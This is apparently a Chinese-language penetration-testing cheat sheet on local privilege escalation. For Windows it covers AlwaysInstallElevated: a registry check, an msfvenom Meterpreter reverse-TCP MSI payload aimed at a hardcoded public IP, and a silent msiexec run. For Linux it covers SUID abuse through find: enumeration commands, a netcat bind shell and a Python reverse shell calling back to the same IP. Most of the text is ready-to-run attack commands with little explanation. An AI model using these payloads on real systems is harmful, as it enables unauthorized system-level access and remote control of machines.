Windows-AlwayslnstallElevated提权

AlwaysInstallElevated是注册表的一个键值（windows 2003)
当其值为1的时候，普通用户即可以system权限安装msi程序。
当前用户权限是否能够更改MSI安装时的启用状态，如不能修改则必须为启用方可使用本次提权技术。

gpedit.msc

用户配置>>管理模板>>Windows 组件>>Windows Installer>>始终以提升的权限进行安装 已启用

.msi是系统安装文件

启动状态才可以成功
判断是否存在window本地提权安全问题：

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

生成利用的MSI文件:

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117  lport=5555 -f msi -o xiaodi.msi

执行MSI:

msiexec /quiet /qn /i xiaodi.msi

SUID提权

手工命令探针安全：

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

存在 Nmap/Vim/find/Bash/More/Less/Nano/cp之一，就有可能存在SUID提权

touch xiaodi

//会创建一个xiaodi的目录，然后通过搜索xiaodi并携带命令达到system的权限执行命令

find xiaodi -exec whoami ;

利用NC反弹：

find xiaodi -exec netcat -lvp 5555 -e /bin/sh ;
netcat xx.xx.xx.xx 5555

利用Python反弹：

find xiaodi -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.94.236.117",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ;
nc -lvp 7777